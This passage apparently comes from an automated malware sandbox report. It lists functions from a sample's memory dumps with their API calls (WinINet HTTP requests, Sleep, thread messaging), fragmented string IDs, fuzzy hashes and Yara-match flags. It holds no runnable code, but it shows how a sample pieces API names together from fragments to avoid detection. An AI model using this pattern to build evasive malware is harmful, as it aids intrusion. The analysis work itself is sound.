                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8a38a3c2d5a28c1a54ff7f45754b823841d070909846f286e4de960be2f9296c
                                      • Instruction ID: 6b25fa7830fee6fd39e4878a760f60eff454eadb0913811af90f27dd9e16c644
                                      • Opcode Fuzzy Hash: 8a38a3c2d5a28c1a54ff7f45754b823841d070909846f286e4de960be2f9296c
                                      • Instruction Fuzzy Hash: 54900265711004030105A55A0754647006697D5391391C022F1005550CDB6188616162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 054595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2498d521ed525e8ab95c27793be25ffa3c14a010ebf440aa6c983bf85fe8f11a
                                      • Instruction ID: d3ebf8c433446eb33e79962d68f929fd3ed2d5b15071757cb4c5ae42241162d0
                                      • Opcode Fuzzy Hash: 2498d521ed525e8ab95c27793be25ffa3c14a010ebf440aa6c983bf85fe8f11a
                                      • Instruction Fuzzy Hash: 919002A1702004034105715A4464756402A97E0241B91C022E1004590DCA6588917166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: cbf47a9814421083680ef4e7d8db2a14114669e4e891f84e3afe25d3ef3976f3
                                      • Instruction ID: 19b4e7f3ab2a1e9ec2d7999b8316cb0574933d8dfeb28b76143fb5397c80dee0
                                      • Opcode Fuzzy Hash: cbf47a9814421083680ef4e7d8db2a14114669e4e891f84e3afe25d3ef3976f3
                                      • Instruction Fuzzy Hash: 3F90027170100802D100659A5458786002597E0341F91D012A5014555ECBA588917172
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5e4bbbecfe15b392b3fe18dbbebbb24b9702068ee089e018179d4c72541d76e3
                                      • Instruction ID: 09e3fcf95b6407dadd5ffd428f3cf2d1da99f214ab77d755a3211f48ef24f857
                                      • Opcode Fuzzy Hash: 5e4bbbecfe15b392b3fe18dbbebbb24b9702068ee089e018179d4c72541d76e3
                                      • Instruction Fuzzy Hash: A690027171114802D110615A8454746002597D1241F91C412A0814558D8BD588917163
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1ab351e0395552d9ee9e79954a3609167e2fda33c56b6a245f2c1a1fa9749988
                                      • Instruction ID: 252965e65cbe3a757cf83a59f797845c8d815b9112942c0593a519a2c11b3a9c
                                      • Opcode Fuzzy Hash: 1ab351e0395552d9ee9e79954a3609167e2fda33c56b6a245f2c1a1fa9749988
                                      • Instruction Fuzzy Hash: 2190026971300402D180715A545874A002597D1242FD1D416A0005558CCE5588696362
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c2af70ce37eb20067017d7fdf9b432cd2b33563a7e7559a7272031a024aba170
                                      • Instruction ID: ae3d7c3d15c5e2b77b24a71a293b6b47ebeb1e6f3c9a1878d9c22e25b4c6784a
                                      • Opcode Fuzzy Hash: c2af70ce37eb20067017d7fdf9b432cd2b33563a7e7559a7272031a024aba170
                                      • Instruction Fuzzy Hash: 8E90027170504C42D140715A4454B86003597D0345F91C012A0054694D9B658D55B6A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8bb027dd51c8525c9259da73ff3622ab8363534ffca3e2a317df65a67c0e826b
                                      • Instruction ID: 4f1b7fa6630763382fb38a0631ec86cf9a0532843b1ecd0a80e9abe799fb8de9
                                      • Opcode Fuzzy Hash: 8bb027dd51c8525c9259da73ff3622ab8363534ffca3e2a317df65a67c0e826b
                                      • Instruction Fuzzy Hash: D090027170100C02D180715A445478A002597D1341FD1C016A0015654DCF558A5977E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 054596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 767af8a92495bd4847b80af4d0556fddd2514e1e6eb336ed7ae803d6a70bb9c2
                                      • Instruction ID: 50484ed4fad482652bfa6d494a1512a9a5cd8c50cdf7978b260edd7070f4740c
                                      • Opcode Fuzzy Hash: 767af8a92495bd4847b80af4d0556fddd2514e1e6eb336ed7ae803d6a70bb9c2
                                      • Instruction Fuzzy Hash: A490027170100C42D100615A4454B86002597E0341F91C017A0114654D8B55C8517562
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 054596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 823888ecc26ab912aa6ad1b7544b098daf5a82226f3de741814422971b0f3025
                                      • Instruction ID: 00bc800183e422e7977309f85011d751ee92fb85bedf0836a12caccef7228d7a
                                      • Opcode Fuzzy Hash: 823888ecc26ab912aa6ad1b7544b098daf5a82226f3de741814422971b0f3025
                                      • Instruction Fuzzy Hash: 8D90027170108C02D110615A845478A002597D0341F95C412A4414658D8BD588917162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 762b43fce521eb64c4f7dc81c669177613a338347857778442477182620e0ca0
                                      • Instruction ID: 51931c36bc82c2565680d553e041c78a89d18e66194e1a443470f2d7b392392d
                                      • Opcode Fuzzy Hash: 762b43fce521eb64c4f7dc81c669177613a338347857778442477182620e0ca0
                                      • Instruction Fuzzy Hash: 8A9002B170100802D140715A4454786002597D0341F91C012A5054554E8B998DD576A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 054599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 16438201e0361c4138f7ab04d75afc728b342904a6ed0fbc8dfc9b8d56f7a21c
                                      • Instruction ID: 75698af99379944c04010f1436312e0cf676b478a057fc2b5c883a916389af49
                                      • Opcode Fuzzy Hash: 16438201e0361c4138f7ab04d75afc728b342904a6ed0fbc8dfc9b8d56f7a21c
                                      • Instruction Fuzzy Hash: 1C9002A174100842D100615A4464B460025D7E1341F91C016E1054554D8B59CC527167
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: f02cec2019961cac8f34818bb5e95e117c3c34cb8036302d13b9b2803b078ae8
                                      • Instruction ID: 6ba4e2a55c02fef34db4d5d3fd33492647885a595173c2a3c781c190822efa09
                                      • Opcode Fuzzy Hash: f02cec2019961cac8f34818bb5e95e117c3c34cb8036302d13b9b2803b078ae8
                                      • Instruction Fuzzy Hash: E6900261742045525545B15A44546474026A7E02817D1C013A1404950C8A669856E662
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b1f99af6ca91b138c2932fad43552b66966c52c21c3dfad164092bcf4944d5da
                                      • Instruction ID: ec587d13ba5d8736999f7d49f550bdce62bacc455d759563aeed39d20198931e
                                      • Opcode Fuzzy Hash: b1f99af6ca91b138c2932fad43552b66966c52c21c3dfad164092bcf4944d5da
                                      • Instruction Fuzzy Hash: B590027170100813D111615A4554747002997D0281FD1C413A0414558D9B968952B162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2ce47891272b6507badb4028829be27019bf8c2236cbb029af3a08ccb9fce16a
                                      • Instruction ID: 5015a4bef8fb7198709c14147e40418787ca02df0f7d4ad977929fe3a9387a64
                                      • Opcode Fuzzy Hash: 2ce47891272b6507badb4028829be27019bf8c2236cbb029af3a08ccb9fce16a
                                      • Instruction Fuzzy Hash: 5390026171180442D200656A4C64B47002597D0343F91C116A0144554CCE5588616562
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238C67, Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 73networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 01238C57
                                      • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 01238CD8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$ConnectOpen
                                      • String ID: A$Conn$ConnectA$Inte$Inte$InternetConnectA$InternetOpenA$Open$ectA$rnet$rnet$rnetConnectA$rnetOpenA
                                      • API String ID: 2790792615-486111735
                                      • Opcode ID: 88582b2792f54a7ab08e720fccbccf80b0a40616adf5c8c1368bfbc405f65de5
                                      • Instruction ID: 974aadcc0a2b5bc1edb78b4961dc126d4393808595d42bd687e770e6b3d5a907
                                      • Opcode Fuzzy Hash: 88582b2792f54a7ab08e720fccbccf80b0a40616adf5c8c1368bfbc405f65de5
                                      • Instruction Fuzzy Hash: 14214CB2915119AFDB14DF98D9419EF7BB8FF88300F048649BE08AB340D670AE10CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238CE7, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 01238D58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: HttpOpenRequest
                                      • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                      • API String ID: 1984915467-4016285707
                                      • Opcode ID: ca81b8d8ccd24e4975ce44ab0ac0e1381164b6bf7f2bdf5d6ff571f717aa409f
                                      • Instruction ID: f3437f48f8585568a8245e28724f450347f1c430c026972f423ee04b8f330a05
                                      • Opcode Fuzzy Hash: ca81b8d8ccd24e4975ce44ab0ac0e1381164b6bf7f2bdf5d6ff571f717aa409f
                                      • Instruction Fuzzy Hash: 3D0129B2910109AFCB14DF89C840EEF7BB9AB98310F158249FE48AB305D270A910CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238CF0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 01238D58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: HttpOpenRequest
                                      • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                      • API String ID: 1984915467-4016285707
                                      • Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                      • Instruction ID: 1bd7f26766b3a10392250639b6aa9164b8d124bcf27f84c949463fcdb3b89e2f
                                      • Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                      • Instruction Fuzzy Hash: CA01E9B2915119AFDB04DF98D841DEF7BB9EB88210F158289FE08AB205D670ED10CBE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238D70, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 01238DCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: HttpRequestSend
                                      • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                      • API String ID: 360639707-2503632690
                                      • Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
                                      • Instruction ID: 4db5ec4bd6a273116502f05bfc8b0a51c32c325e9a67709e3f5c9ae55bffc810
                                      • Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
                                      • Instruction Fuzzy Hash: 7E014FB290511DAFDB04DF98D8459BF7BB8EB94210F148189FD08A7204D670EE10CBE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238C70, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 01238CD8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ConnectInternet
                                      • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                      • API String ID: 3050416762-1024195942
                                      • Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                      • Instruction ID: d08ed825eef55c593f9a87a5b88461aaf9eac9f78a3f8999fc63898ffc345577
                                      • Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
                                      • Instruction Fuzzy Hash: 6701E9B2915119AFDB14DF99D941EEF7BB8EB48310F154289BE08A7240D670EE10CBE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238BF8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 47networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 01238C57
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                      • API String ID: 2038078732-3155091674
                                      • Opcode ID: efea0823c6b5bc7aa77398415ffe99b3ed624da4667fcdd44c4a81a3845f3b0f
                                      • Instruction ID: bcf949d81eddfaf25f07314e951fdc5f6c9535cb1679775605d7ef8dc94783ff
                                      • Opcode Fuzzy Hash: efea0823c6b5bc7aa77398415ffe99b3ed624da4667fcdd44c4a81a3845f3b0f
                                      • Instruction Fuzzy Hash: C0012CF2911119AF9F14DFD8DC41DFBBBB9EF88310B148649FA1897201D231AA508BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238C00, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 01238C57
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                      • API String ID: 2038078732-3155091674
                                      • Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                      • Instruction ID: b5ec064668e0dcd3125fbbcfaf20d3b98ddd43b5074ae1e858f26b437e0c0e51
                                      • Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
                                      • Instruction Fuzzy Hash: 05F019B2911119AF9B14DFD9DC419FBB7B8EF88310B048689BE1897201D675AA60CBE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238D66, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 01238DCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: HttpRequestSend
                                      • String ID: HttpSendRequestA$RequestA$SendRequestA
                                      • API String ID: 360639707-2125227114
                                      • Opcode ID: dce49c71a1a6e9d8d7a3190acb50df0d7f6d64e59ec9020c2c81632475e5176e
                                      • Instruction ID: 94e24e70703eb279a3e0a7914d3dbeadc85d0f49f5d260644ee52c96804d652d
                                      • Opcode Fuzzy Hash: dce49c71a1a6e9d8d7a3190acb50df0d7f6d64e59ec9020c2c81632475e5176e
                                      • Instruction Fuzzy Hash: A3E092B2A1511E9FCB15DE68D8859EB3768EB99250B04468AFD458B201F6319C1287E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01237300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 012373A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
                                      • Instruction ID: 36fedb2a596a79b3a7c56ac9e915fc13e7dfa3a26d356bf345c9a0bbedf8ce7e
                                      • Opcode Fuzzy Hash: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
                                      • Instruction Fuzzy Hash: C4318FF6511705ABDB15EF68C8A1FABB7B8EF88700F00811DFA599B241D770B546CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 012372F6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 012373A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: dbdac8a2a0bb1ebc07f4d9d45091e35c9cc3750275476bc266f13b2a6965d6f0
                                      • Instruction ID: 2129713a6071133bab8d5b59257b3cc002fafd1fa69d6b1cd56fa9311f909a13
                                      • Opcode Fuzzy Hash: dbdac8a2a0bb1ebc07f4d9d45091e35c9cc3750275476bc266f13b2a6965d6f0
                                      • Instruction Fuzzy Hash: B621C3F1511601ABDB11EF68C8A1FABBBB4BF88700F048119F6599B241D770A445CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 012388E7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01223B93), ref: 0123891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 62da0c7f2ab652fa849f6c495aae2a00e1a9cc7d7d4d88dd059293ec345a5420
                                      • Instruction ID: d3cb63d5b25dfd8fb369d1decbe9b2aa9491223fcce2d8b2e50342ad11f36623
                                      • Opcode Fuzzy Hash: 62da0c7f2ab652fa849f6c495aae2a00e1a9cc7d7d4d88dd059293ec345a5420
                                      • Instruction Fuzzy Hash: B4E092B1204201AFE718EF54DC44EEB776DEFC8750F144588F9485B241C231E910CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 012388F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01223B93), ref: 0123891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: 37280a5632897849b12059e030d352a462f2af8963c5d1ef6a47615e9eb1691d
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: 2DE046B1210208ABDB18EF99CC48EA777ACEF88750F018558FE086B241C670F910CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01227280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 012272DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 012272FB
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                      • Instruction ID: 6e30085991ebd1e99e42afac190b429271aba8a4f103aa377361be2c113ffa4c
                                      • Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                      • Instruction Fuzzy Hash: A901F771A9023A77EB21A6949C02FBE772C5B51B51F040114FF04BA1C0EA94690542F6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01227226, Relevance: 3.1, APIs: 2, Instructions: 52threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 012272DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 012272FB
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 73986c5ecec8419a28994bef90c98c9af250ddfaefce8324c9abee58b35ae773
                                      • Instruction ID: c1f9f2d55385b8ec51baa2fd051d27cebf6e9277641cd1410a30ff63f098c51c
